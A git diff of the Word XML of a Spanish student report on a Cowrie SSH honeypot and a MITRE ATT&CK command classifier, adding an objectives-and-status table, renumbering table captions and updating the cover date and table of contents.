+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Cumplido</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">OE2. Instalar Cowrie con una identidad verosímil y registrar toda la actividad.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2150"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">nmap identifica el puerto 22 como OpenSSH de Debian 12; los atacantes ejecutan comandos; cada evento queda en cowrie.json.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Cumplido</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">OE3. Automatizar el despliegue para que sea reproducible en cualquier proveedor.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2150"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Un Ubuntu 24.04 recién creado queda operativo ejecutando tres scripts, sin pasos manuales adicionales.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Cumplido</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">OE4. Capturar ataques reales durante un periodo suficiente.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2150"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Al menos tres semanas de captura continua.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">En curso (desde el 4 de octubre)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">OE5. Desarrollar un analizador automático de los logs.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2150"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Rankings, geolocalización, indicadores de compromiso y gráficas generados en una sola ejecución sobre más de 10 000 sesiones.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Cumplido</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">OE6. Clasificar automáticamente la actividad en MITRE ATT&amp;CK.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2150"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Al menos el 95 % de los comandos con técnica asignada y un conjunto de pruebas automáticas superado.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Cumplido con datos parciales (98,5 %; 50/50 pruebas)</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">OE7. Elaborar el informe de inteligencia de amenazas.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2150"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Informe con campañas identificadas, indicadores de compromiso y recomendaciones vinculadas a mitigaciones de ATT&amp;CK.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">En curso</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+      <w:tr>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1850"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">OE8. Documentar el proyecto de forma reproducible.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="2150"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">Memoria con el formato de Prometeo y repositorio público con scripts, configuración y capturas.</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+        <w:tc>
+          <w:tcPr>
+            <w:tcW w:type="pct" w:w="1000"/>
+            <w:vAlign w:val="center"/>
+          </w:tcPr>
+          <w:p>
+            <w:pPr>
+              <w:spacing w:line="276"/>
+              <w:jc w:val="left"/>
+            </w:pPr>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+                <w:b w:val="false"/>
+                <w:bCs w:val="false"/>
+                <w:sz w:val="20"/>
+                <w:szCs w:val="20"/>
+              </w:rPr>
+              <w:t xml:space="preserve">En curso</w:t>
+            </w:r>
+          </w:p>
+        </w:tc>
+      </w:tr>
+    </w:tbl>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:after="240" w:before="60" w:line="360"/>
+        <w:jc w:val="center"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:i w:val="false"/>
+          <w:iCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Tabla 4. Objetivos específicos, indicadores y estado.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="Heading2"/>
+        <w:keepNext/>
+        <w:spacing w:after="240" w:before="240" w:line="360"/>
+        <w:jc w:val="left"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b/>
+          <w:bCs/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Desglose RFTP</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17068,7 +21870,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 2. Catálogo de técnicas MITRE ATT&amp;CK del clasificador.</w:t>
+        <w:t xml:space="preserve">Tabla 5. Catálogo de técnicas MITRE ATT&amp;CK del clasificador.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -17675,7 +22477,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 3. Scripts de despliegue y comprobaciones de seguridad.</w:t>
+        <w:t xml:space="preserve">Tabla 6. Scripts de despliegue y comprobaciones de seguridad.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -18829,7 +23631,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 4. Opciones de Cowrie modificadas.</w:t>
+        <w:t xml:space="preserve">Tabla 7. Opciones de Cowrie modificadas.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19741,7 +24543,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 5. Funciones del analizador.</w:t>
+        <w:t xml:space="preserve">Tabla 8. Funciones del analizador.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -19816,7 +24618,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El módulo define un catálogo de reglas (Tabla 2), cada una formada por el identificador de la técnica, su nombre oficial, la táctica a la que pertenece, una expresión regular que reconoce los indicadores en el texto del comando y una recomendación defensiva, con la referencia a la mitigación de ATT&amp;CK (M1022, M1027, M1029...) cuando el marco la define. Las decisiones de diseño más relevantes son:</w:t>
+        <w:t xml:space="preserve">El módulo define un catálogo de reglas (Tabla 5), cada una formada por el identificador de la técnica, su nombre oficial, la táctica a la que pertenece, una expresión regular que reconoce los indicadores en el texto del comando y una recomendación defensiva, con la referencia a la mitigación de ATT&amp;CK (M1022, M1027, M1029...) cuando el marco la define. Las decisiones de diseño más relevantes son:</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -20457,7 +25259,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 6. Tratamiento de las respuestas de la API de OCI.</w:t>
+        <w:t xml:space="preserve">Tabla 9. Tratamiento de las respuestas de la API de OCI.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21340,7 +26142,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 7. Resultados de la prueba de autenticación.</w:t>
+        <w:t xml:space="preserve">Tabla 10. Resultados de la prueba de autenticación.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -21942,7 +26744,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 8. Eventos registrados por Cowrie en el ataque simulado.</w:t>
+        <w:t xml:space="preserve">Tabla 11. Eventos registrados por Cowrie en el ataque simulado.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -22516,7 +27318,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 9. Casos de prueba del clasificador con riesgo de error.</w:t>
+        <w:t xml:space="preserve">Tabla 12. Casos de prueba del clasificador con riesgo de error.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23168,7 +27970,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 10. Pruebas del script de aprovisionamiento.</w:t>
+        <w:t xml:space="preserve">Tabla 13. Pruebas del script de aprovisionamiento.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -23961,7 +28763,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 11. Resultado del escaneo externo con nmap.</w:t>
+        <w:t xml:space="preserve">Tabla 14. Resultado del escaneo externo con nmap.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24473,7 +29275,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 12. Resumen de la actividad capturada (4–7 de octubre de 2026).</w:t>
+        <w:t xml:space="preserve">Tabla 15. Resumen de la actividad capturada (4–7 de octubre de 2026).</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -24607,7 +29409,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Todos los indicadores apuntan a herramientas automatizadas y no a operadores humanos. En las sesiones con comandos, la mediana entre la autenticación y el primer comando es de 0,7 segundos, y la mitad de todas las sesiones dura menos de 1,4 segundos. El 85,2 % de las conexiones se identifican con el cliente SSH-2.0-Go, una biblioteca de programación y no un cliente interactivo; le siguen libssh (12,8 %) y, de forma testimonial, PuTTY (0,8 %). La Tabla 13 clasifica las sesiones según lo que llegó a hacer el atacante.</w:t>
+        <w:t xml:space="preserve">Todos los indicadores apuntan a herramientas automatizadas y no a operadores humanos. En las sesiones con comandos, la mediana entre la autenticación y el primer comando es de 0,7 segundos, y la mitad de todas las sesiones dura menos de 1,4 segundos. El 85,2 % de las conexiones se identifican con el cliente SSH-2.0-Go, una biblioteca de programación y no un cliente interactivo; le siguen libssh (12,8 %) y, de forma testimonial, PuTTY (0,8 %). La Tabla 16 clasifica las sesiones según lo que llegó a hacer el atacante.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -24989,7 +29791,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 13. Clasificación de las sesiones por comportamiento.</w:t>
+        <w:t xml:space="preserve">Tabla 16. Clasificación de las sesiones por comportamiento.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -25968,7 +30770,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 14. Campañas y comportamientos identificados.</w:t>
+        <w:t xml:space="preserve">Tabla 17. Campañas y comportamientos identificados.</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -26043,7 +30845,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">El clasificador asignó la actividad a 21 técnicas de 9 tácticas. La Tabla 15 resume las más relevantes de cada táctica y la Figura 8 muestra todas ellas por número de sesiones.</w:t>
+        <w:t xml:space="preserve">El clasificador asignó la actividad a 21 técnicas de 9 tácticas. La Tabla 18 resume las más relevantes de cada táctica y la Figura 8 muestra todas ellas por número de sesiones.</w:t>
       </w:r>
     </w:p>
     <w:tbl>
@@ -26901,7 +31703,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Tabla 15. Técnicas MITRE ATT&amp;CK más relevantes por táctica.</w:t>
+        <w:t xml:space="preserve">Tabla 18. Técnicas MITRE ATT&amp;CK más relevantes por táctica.</w:t>
       </w:r>
     </w:p>
     <w:p>

--- a/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
+++ b/docs/Memoria_PIASIR_Diego_Perez_Fonterosa.docx
@@ -4,13 +4,13 @@
   <w:body>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="200"/>
+        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
         <w:jc w:val="right"/>
       </w:pPr>
       <w:r>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="2095500" cy="523875"/>
+            <wp:extent cx="1905000" cy="323850"/>
             <wp:effectExtent t="0" r="0" b="0" l="0"/>
             <wp:docPr id="1" name="" descr="" title=""/>
             <wp:cNvGraphicFramePr>
@@ -35,7 +35,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2095500" cy="523875"/>
+                      <a:ext cx="1905000" cy="323850"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -102,13 +102,13 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:spacing w:after="200"/>
+        <w:spacing w:after="200" w:line="240" w:lineRule="auto"/>
         <w:jc w:val="center"/>
       </w:pPr>
       <w:r>
         <w:drawing>
           <wp:inline distT="0" distB="0" distL="0" distR="0">
-            <wp:extent cx="2667000" cy="666750"/>
+            <wp:extent cx="3048000" cy="619125"/>
             <wp:effectExtent t="0" r="0" b="0" l="0"/>
             <wp:docPr id="2" name="" descr="" title=""/>
             <wp:cNvGraphicFramePr>
@@ -133,7 +133,7 @@
                   <pic:spPr bwMode="auto">
                     <a:xfrm>
                       <a:off x="0" y="0"/>
-                      <a:ext cx="2667000" cy="666750"/>
+                      <a:ext cx="3048000" cy="619125"/>
                     </a:xfrm>
                     <a:prstGeom prst="rect">
                       <a:avLst/>
@@ -423,7 +423,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Diciembre 2026</w:t>
+        <w:t xml:space="preserve">Primera entrega parcial · Octubre de 2026</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1029,7 +1029,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	19</w:t>
+        <w:t xml:space="preserve">	20</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1048,7 +1048,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Arquitectura General</w:t>
+        <w:t xml:space="preserve">Estado de los Componentes</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1058,7 +1058,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	19</w:t>
+        <w:t xml:space="preserve">	20</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1077,7 +1077,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Flujo de Datos</w:t>
+        <w:t xml:space="preserve">Arquitectura General</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1087,7 +1087,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	19</w:t>
+        <w:t xml:space="preserve">	20</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1106,7 +1106,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Seguridad y Aislamiento</w:t>
+        <w:t xml:space="preserve">Flujo de Datos</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1116,7 +1116,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	20</w:t>
+        <w:t xml:space="preserve">	21</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1135,7 +1135,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">Casos de Uso</w:t>
+        <w:t xml:space="preserve">Seguridad y Aislamiento</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1145,7 +1145,36 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
         </w:rPr>
-        <w:t xml:space="preserve">	21</w:t>
+        <w:t xml:space="preserve">	22</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="right" w:pos="7881" w:leader="dot"/>
+        </w:tabs>
+        <w:spacing w:before="0" w:line="276"/>
+        <w:ind w:left="425"/>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">Casos de Uso</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Arial" w:cs="Arial" w:eastAsia="Arial" w:hAnsi="Arial"/>
+          <w:b w:val="false"/>
+          <w:bCs w:val="false"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">	22</w:t>
       </w:r>
     </w:p>
     <w:p>
@@ -1174,7 +1203,7 @@
           <w:sz w:val="24"/>
           <w:szCs w:val="24"/>
